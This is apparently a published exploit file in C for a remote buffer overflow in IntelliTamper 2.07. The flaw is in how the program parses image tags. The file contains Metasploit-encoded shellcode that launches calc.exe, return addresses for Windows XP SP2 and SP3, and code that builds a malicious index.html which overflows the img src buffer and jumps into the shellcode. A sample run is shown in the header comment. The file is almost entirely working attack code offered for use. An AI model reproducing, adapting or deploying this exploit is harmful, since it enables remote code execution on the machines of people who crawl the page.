intellitamperimgsrc-overflow.txt

`/*  
* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit  
*  
* Discovered & Written by r0ut3r (writ3r [at] gmail.com)  
* Many Thanks to Luigi Auriemma (http://aluigi.org)  
*  
* Greets to shinnai (http://www.shinnai.net)  
* and Guido Landi  
*  
* IntelliTamper contains a remote buffer overflow vulnerability.  
* The HTML parser, more precise the image tag fails to preform  
* boundary checks on supplied data.  
*  
* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c  
* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0  
* [!] OS: Microsoft Windows XP Pro SP 2  
* [+] Building payload  
* [+] Inserting JMP code  
* [+] Success writing to index.html  
* kit:/home/r0ut3r/public_html/imgsrc-xpl #  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
/* win32_exec - EXITFUNC=thread CMD=c:\windows\system32\calc.exe Size=184  
Encoder=PexFnstenvSub http://metasploit.com  
Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */  
unsigned char shellcode[] =  
"\x31\xc9\x83\xe9\xd8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x99"  
"\xeb\x8d\x6a\x83\xeb\xfc\xe2\xf4\x65\x03\xc9\x6a\x99\xeb\x06\x2f"  
"\xa5\x60\xf1\x6f\xe1\xea\x62\xe1\xd6\xf3\x06\x35\xb9\xea\x66\x23"  
"\x12\xdf\x06\x6b\x77\xda\x4d\xf3\x35\x6f\x4d\x1e\x9e\x2a\x47\x67"  
"\x98\x29\x66\x9e\xa2\xbf\xa9\x6e\xec\x0e\x06\x35\xbd\xea\x66\x0c"  
"\x12\xe7\xc6\xe1\xc6\xf7\x8c\x81\x12\xf7\x06\x6b\x72\x62\xd1\x4e"  
"\x9d\x28\xbc\xaa\xfd\x60\xcd\x5a\x1c\x2b\xf5\x66\x12\xab\x81\xe1"  
"\xe9\xf7\x20\xe1\xf1\xe3\x66\x63\x12\x6b\x3d\x6a\x99\xeb\x06\x02"  
"\xa5\xb4\xbc\x9c\xf9\xbd\x04\x92\x1a\x2b\xf6\x3a\xf1\x04\x43\x8a"  
"\xf9\x83\x15\x94\x13\xe5\xda\x95\x7e\x88\xb7\x36\xee\x82\xe3\x0e"  
"\xf6\x9c\xfe\x36\xea\x92\xfe\x1e\xfc\x86\xbe\x58\xc5\x88\xec\x06"  
"\xfa\xc5\xe8\x12\xfc\xeb\x8d\x6a";  
  
#define JMP 0xe9 //JMP  
  
int main(int argc, char* argv[])  
{  
FILE *fd;  
unsigned char buff[4000],  
*jmpref,  
*p;  
int opt;  
  
struct  
{  
char *os;  
unsigned int eip;  
} targets[] =  
{  
"Microsoft Windows XP Pro SP 2",  
0x7d040e1f,  
  
"Microsoft Windows XP Pro SP 3",  
0x7c8369f0  
};  
  
if (argc < 2)  
{  
printf("---------------------------------------------------------\n");  
printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit \n\n");  
  
printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)\n");  
printf(" Thanks to Luigi Auriemma (http://aluigi.org)\n\n");  
  
printf(" Usage: %s <OS-type>\n", argv[0]);  
printf(" 0: Microsoft Windows XP Pro SP2\n");  
printf(" 1: Microsoft Windows XP Pro SP3\n");  
printf("---------------------------------------------------------\n");  
return 1;  
}  
  
p = buff;  
  
switch (atoi(argv[1]))  
{  
case 0:  
opt = 0;  
printf("[!] OS: %s\n", targets[0].os);  
break;  
  
case 1:  
opt = 1;  
printf("[!] OS: %s\n", targets[1].os);  
break;  
}  
  
printf("[+] Building payload\n");  
p += sprintf(p, "<img src=\"http://");  
  
jmpref = p;  
  
p += sprintf(p, "%s", shellcode);  
  
int i;  
int a = 3065 - (p - jmpref);  
for (i=0; i < a; i++)  
*p++ = 'A';  
  
*(unsigned int *) p = targets[opt].eip;  
p += 4;  
  
printf("[+] Inserting JMP code\n");  
  
*p++ = JMP;  
*(unsigned int *) p = jmpref - (p + 4); //JMP -(3065+4+5)  
p += 4;  
  
p += sprintf(p, "\">");  
  
fd = fopen("index.html", "wb");  
if (fd == NULL)  
{  
perror("[-] Failed opening index.html\n");  
return 1;  
}  
  
fwrite(buff, 1, p - buff, fd);  
if (fclose(fd) == 0)  
printf("[+] Success writing to index.html\n");  
else  
printf("[-] Failed writing to index.html\n");  
  
return 0;  
}  
`